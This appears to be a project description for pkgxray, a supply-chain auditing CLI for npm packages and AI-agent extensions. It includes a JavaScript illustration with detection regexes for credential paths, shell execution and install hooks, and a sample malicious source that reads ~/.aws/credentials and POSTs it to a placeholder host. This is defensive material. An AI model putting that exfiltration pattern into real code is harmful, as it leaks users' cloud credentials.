A zero-dependency tool for auditing AI extensions and npm packages.
Pitch

pkgxray is a local CLI tool for auditing AI-agent extensions and npm packages for supply-chain risks. Using static scans and OSV vulnerability prechecks, it evaluates code before installation so that only vetted packages reach your environment.

Description

pkgxray is a local CLI and MCP server for assessing the safety of AI coding-agent extensions (Codex plugins and Claude Code extensions) and npm packages. Users either supply evidence directly or let the tool fetch the real npm tarball into a sandboxed quarantine directory. All analysis runs locally, and the tool itself carries no third-party dependencies.

Key Features

Evidence-Based Auditing

pkgxray employs a conservative approach, offering assessments based solely on verifiable metadata or source text. Each evaluation results in one of three conclusions:

  • safe: indicating no significant risk factors,
  • review: signifying incomplete evidence or capabilities that require human inspection,
  • block: highlighting serious concerns such as prompt injection, credential access, or other critical security indicators.

Comprehensive Risk Assessment

This tool surfaces supply-chain risks before any package code runs on a local machine. The risk categories pkgxray detects include:

  • Common Vulnerabilities and Exposures (CVE): Automatically queries the Open Source Vulnerability (OSV) database for known issues, preventing the download of compromised packages. For example, running pkgxray guard npm:axios@1.7.7 can reveal and block 20+ published advisories without downloading any code.
  • Credential and Secret Exposure: Identifies attempts to access sensitive data such as .ssh, .aws, or environment variable files.
  • Exfiltration Techniques: Flags patterns associated with data leaks, including co-located environment writes and outbound network requests.
  • Persistence Mechanisms: Detects scripts that manipulate system settings or persistent storage.
  • Obfuscation and Execution Patterns: Identifies suspicious code constructs designed to hide malicious activities.
  • Prompt Injection Risks: Reviews hidden instructions that may aim to manipulate AI agents during operations.
  • Discrepancies Between npm and GitHub Sources: Highlights differences in files between the npm tarball and the GitHub repository, prompting further investigation.
  • Package Provenance Verification: Confirms that packages are linked to their claimed source repositories through npm's sigstore/SLSA attestations.
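The evidence-based verdict model and the credential-access and exfiltration heuristics described above, as an added illustration that is not pkgxray's own code. It assumes a simplified scanner that takes package.json text plus concatenated source text, records each finding as a named piece of evidence, and maps the findings to safe, review or block; the regexes, evidence names and sample packages are constructed for this example.

```javascript
// Constructed heuristics: each regex stands in for one detection category from
// the feature list. Real scanners tokenise and resolve identifiers; this does not.
const CREDENTIAL_PATHS = /\.(ssh|aws|npmrc)\b/;                 // credential and secret exposure
const ENV_ACCESS = /process\.env\b/;                            // environment access
const OUTBOUND = /\b(fetch|https?\.request|net\.connect)\s*\(/; // outbound network request
const SHELL_EXEC = /\b(child_process|execSync|spawn)\b/;        // execution pattern
const INSTALL_HOOK = /"(preinstall|postinstall|install)"\s*:/;  // persistence via lifecycle script

// Findings that on their own justify a block verdict (assumed policy).
const BLOCKING = new Set([
  'credential-path-access',
  'env-access-with-outbound-network',
  'install-script-shell-exec',
]);

// Returns { verdict, evidence }. Evidence is only what the text itself shows;
// anything not observed is not claimed.
function audit(manifestText, sourceText) {
  const evidence = [];
  const hasEnv = ENV_ACCESS.test(sourceText);
  const hasNet = OUTBOUND.test(sourceText);
  const hasHook = INSTALL_HOOK.test(manifestText);

  if (CREDENTIAL_PATHS.test(sourceText)) evidence.push('credential-path-access');
  // Co-located environment access and an outbound request is the exfiltration
  // pattern the feature list names; either alone is only worth a human look.
  if (hasEnv && hasNet) evidence.push('env-access-with-outbound-network');
  else if (hasNet) evidence.push('outbound-network');
  if (hasHook) evidence.push('install-script');
  if (hasHook && SHELL_EXEC.test(sourceText)) evidence.push('install-script-shell-exec');

  let verdict = 'safe';
  if (evidence.some((e) => BLOCKING.has(e))) verdict = 'block';
  else if (evidence.length > 0) verdict = 'review'; // capability present, evidence inconclusive
  return { verdict, evidence };
}

// Constructed sample packages.
const benignManifest = '{"name":"padder","version":"1.0.0"}';
const benignSource = 'module.exports = (s, n) => s.padStart(n);';
const reviewSource = 'fetch("https://telemetry.example/ping");';
const badManifest = '{"name":"x","scripts":{"postinstall":"node setup.js"}}';
const badSource = [
  'const fs = require("fs");',
  'const key = fs.readFileSync(process.env.HOME + "/.aws/credentials", "utf8");',
  'fetch("https://collector.example/upload", { method: "POST", body: key });',
].join('\n');
```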

Fast and Secure

pkgxray fetches packages into a sandboxed quarantine directory and reaches a decision in approximately one second per package. It never executes installation scripts or any package code, so the audit itself adds no installation risk.

User-Friendly Command-Line Interface (CLI)

The command-line interface enables users to audit evidence files, audit entire project lockfiles, or pre-screen extensions before utilization. Examples of command usage include:

# Audit supplied evidence
pkgxray --file examples/evidence.json

# Audit a whole project's lockfile
pkgxray audit package-lock.json

MCP Server Integration

pkgxray can interface seamlessly with any MCP-capable agent, providing a suite of functions for auditing and guarding package installations.

Performance Metrics

pkgxray is fast enough to run on every install, and execution times have been measured for popular packages. For instance, running the guard operation on express@4.21.0 takes approximately 1.4 seconds.

Cache Server

To improve performance further, pkgxray supports a self-hostable cache server that consolidates the network traffic generated by audit and guard operations. This reduces redundant requests across multiple CI/CD runners.

Local Development and Testing

With a structured development workflow, developers can test and build features easily using available npm scripts.

Overall, pkgxray emerges as an essential tool for developers and security analysts seeking to secure their environments against potential supply-chain vulnerabilities, all while maintaining a fast and efficient workflow.
